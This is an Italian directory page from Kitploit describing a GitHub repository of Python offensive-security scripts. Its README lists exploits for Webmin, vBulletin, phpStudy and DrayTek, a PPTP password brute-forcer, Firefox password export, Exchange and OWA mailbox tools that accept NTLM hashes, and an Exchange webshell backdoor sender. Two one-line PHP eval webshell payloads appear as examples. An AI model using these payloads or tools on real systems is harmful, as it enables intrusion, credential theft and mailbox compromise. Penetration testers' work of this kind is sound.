Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Homework-of-Python — Codici Python del mio blog. | Kitploit
Strumenti/GitHubGitHub/3gstudent/homework-of-python
Scanner di VulnerabilitàAttacchi alle PasswordExploitSfruttamento di Applicazioni WebRaccolta InformazioniPost-ExploitRed TeamingSviluppo Payload
GitHub3gstudent/homework-of-python

Homework-of-Python

Codici Python del mio blog.

Vedi Repository
412126183 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Homework-of-Python

Codici Python del mio blog.

pptp_password_hack.py

Usa un attacco di forza bruta per ottenere la password della VPN PPTP.

Legge le password dal file (chiamato wordlist) e poi usa pptpsetup per connettersi al server.

L'intervallo di tempo è di 10 secondi.


portscan.py

Usato per scansionare le porte.

Il timeout è di 3 secondi.

versione C++:

https://github.com/3gstudent/Homework-of-C-Language/blob/master/portscan.cpp


urltoip.py

Usato per ottenere l'IP da un URL.

Posso usare direttamente il risultato di Sublist3r.

file_deduplication(For_urltoip).py

Usato per rimuovere gli IP duplicati dal risultato di Sublist3r.

Posso usare direttamente il risultato di urltoip.py.

Gli IP possono essere ordinati usando Sublime (F9).


file_deduplication.py

Usato per rimuovere elementi duplicati da un file.

Webmin<=1.920-Unauthenticated_RCE(CVE-2019-15107).py

Riferimento:

https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html


fofa_api.py

Usato per chiamare l'API di fofa e stampare gli IP dai risultati.

Puoi ottenere 100 risultati.

fofa_api_VIP.py

Usato per chiamare l'API di fofa e stampare gli IP dai risultati.

Se sei VIP, ottieni 10000 risultati.


vBulletin_5.x_0day_pre-auth_RCE.py

Riferimento:

https://seclists.org/fulldisclosure/2019/Sep/31

Es.

echo \<?php @eval\(\$_POST[pwd]\)\;?\> >test.php

phpStudy_5.2-5.45_(php_xmlrpc.dll)_backdoor_RCE.py

Riferimento:

https://mp.weixin.qq.com/s/dTzWfYGdkNqEl0vd72oC2w

Es.

system('cmd /c "echo ^<?php @eval(^$_POST[pwd]);?^> >D:\phpstudy\WWW\test.php"');

ExportFirefoxPassword.py

Usato per esportare la password di Firefox

get_Exchange_version.py

Usato per ottenere la versione di Exchange.

Prima ottieni il BuildNumber dal codice sorgente dell'URL e poi ottieni la versione.

Riferimento:

https://docs.microsoft.com/en-us/Exchange/new-features/build-numbers-and-release-dates?redirectedfrom=MSDN&view=exchserver-2019


SMBv3_RCE_Scanner(CVE-2020-0796).py

Usato per scansionare la vulnerabilità SMBv3 RCE.

Il timeout è di 3 secondi.


Unauthenticated_RCE_in_Draytek_Vigor2960\3900\300B.py

Riferimento:

https://github.com/imjdl/CVE-2020-8515-PoC

CVE-2020-8515

I dispositivi DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta e Vigor300B 1.3.3_Beta, 1.4.2.1_Beta e 1.4.4_Beta consentono l'esecuzione remota di codice come root (senza autenticazione) tramite metacaratteri di shell verso l'URI cgi-bin/mainfunction.cgi..

Prodotti interessati:

  • Vigor300B <v1.5.1
  • Vigor2960 <v1.5.1
  • Vigor3900 <v1.5.1

Zimbra_SOAP_API_Manage.py

Usa l'API SOAP di Zimbra per connettersi al server di posta Zimbra.

Uso:

      Zimbra_SOAP_API.py <url> <username> <password> <mode>

modalità:

  • low autenticazione per token basso
  • admin autenticazione per token admin
  • ssrf usa CVE-2019-9621 per ottenere il token admin

Es:

      Zimbra_SOAP_API.py https://192.168.1.1 [email protected] password low

checkEWS.py

Usato per verificare la validità di un account di Exchange Web Service (supporta plaintext e ntlmhash)

Riferimento:https://github.com/dirkjanm/PrivExchange/blob/master/privexchange.py

Uso:

checkEWS.py <host> <port> <mode> <domain> <user> <password>
<mode>:
- plaintext
- ntlmhash

Es.

checkEWS.py 192.168.1.1 443 plaintext test.com user1 password1
checkEWS.py test.com 80 ntlmhash test.com user1 c5a237b7e9d8e708d8436b6148a25fa1

checkAutodiscover.py

Usato per accedere ad Autodiscover.xml e ottenere la configurazione dell'utente (supporta plaintext e ntlmhash)

Uso:

checkAutodiscover.py <host> <port> <mode> <email> <password> <command>
<command>:
- checkautodiscover
- getusersetting
- checkoab
- downloadlzx

Es.

checkAutodiscover.py 192.168.1.1 443 plaintext [email protected] password1 checkaut
odiscover
checkAutodiscover.py test.com 80 ntlmhash [email protected] c5a237b7e9d8e708d8436b6
148a25fa1 getusersetting

checkAutodiscoverEx.py

Modalità extra di checkAutodiscover.py

Aggiunge un parametro

ewsManage.py

Usato per accedere a Exchange Web Service (supporta plaintext e ntlmhash)

Uso:

ewsManage.py <host> <port> <mode> <domain> <user> <password> <command>
<mode>:
- plaintext
- ntlmhash
<command>:
- getfolderofinbox
- getfolderofsentitems
- listmailofinbox
- listmailofsentitems
- listmailoffolder
- getmail
- deletemail
- deletefolder
- getattachment
- saveattachment
- getdelegateofinbox
- adddelegateofinbox
- updatedelegateofinbox
- removedelegateofinbox
- getdelegateofinbox2
- updatedelegateofinbox2
- restoredelegateofinbox2
- getinboxrules
- updateinboxrules
- removeinboxrules
- deleteattachment
- createattachment
- createfolderofinbox
- listhiddenfolderofinbox
- createtestmail
- SetHiddenPropertyType
- UpdateHiddenPropertyType
- getcontact
- findpeople
- findallpeople
- resolvename
- resolveallname


Es.

ewsManage.py 192.168.1.1 443 plaintext test.com user1 password1 getfolderofinbox
ewsManage.py test.com 80 ntlmhash test.com user1 c5a237b7e9d8e708d8436b6148a25fa1 listmailofinbox

sshCheck.py

Usato per verificare credenziali SSH valide (supporta password e file di chiave privata)

Uso:

sshCheck.py <host> <port> <mode><user> <password>
<mode>:
- plaintext
- keyfile

Es.

sshCheck.py 192.168.1.1 22 plaintext root toor
sshCheck.py 192.168.1.1 22 keyfile root id_rsa

sshRunCmd

Esecuzione remota di comandi via SSH (supporta password e file di chiave privata)

Uso:

sshRunCmd.py <host> <port> <mode><user> <password> <cmd>
<mode>:
- plaintext
- keyfile
If the <cmd> is shell,you will get an interactive shell

Es.

sshRunCmd.py 192.168.1.1 22 plaintext root toor shell
sshRunCmd.py 192.168.1.1 22 keyfile root id_rsa ps

easCheck.py

Usato per verificare la validità delle credenziali EAS (Exchange Server ActiveSync)

Uso:

easCheck.py <host> <user> <password>

Es.

easCheck.py 192.168.1.1 user1 password1

checkOWA.py

Usato per verificare la validità di un account Exchange connettendosi a OWA.

Uso:

checkOWA.py <url> <user> <password>

owaManage.py

Usato per leggere le email connettendosi a OWA.

Uso:

owaManage.py  <url> <user> <password> <command>
<command>
- ListFolder
- ViewMail
- DownloadAttachment

imapManage.py

Usa IMAP per connettersi al server di posta.

Uso:

imapManage.py <IMAP server> <username> <password> <command>    
<command>:
CheckConfig             get the folder name
SaveAttachOfInbox       save the attachments of Inbox
SaveAttachOfSent        save the attachments of Sent
DownloadAllMailOfInbox  download all the mails of Inbox
DownloadAllMailOfSent   download all the mails of Sent
Eg:
imapManage.py 192.168.1.1 user1 password CheckConfig

aspxCmdNTLM.py

Usato per implementare l'autenticazione NTLM e comunicare con execCmd.aspx

I dati di comunicazione sono codificati con Base64

Uso:

aspxCmdNTLM.py <host> <port> <url> <mode> <domain> <user> <password> <command>
<mode>:
- plaintext
- ntlmhash
Eg.
aspxCmdNTLM.py 192.168.1.1 443 https://192.168.1.1/1.txt plaintext test.com user
1 password1 whoami
aspxCmdNTLM.py test.com 80 http://192.168.1.1/1.aspx ntlmhash test.com user1 c5a
237b7e9d8e708d8436b6148a25fa1 whoami

SharpExchangeBackdoor.py

Versione C#: SharpExchangeBackdoor.cs

Usato per inviare payload alla backdoor webshell di Exchange.

Supporta:

  • assemblyLoad
  • webshellWrite

Uso:

    <url> <user> <password> <mode> <path>
mode:
    assemblyLoad
    webshellWrite

es.

Scarica lo strumento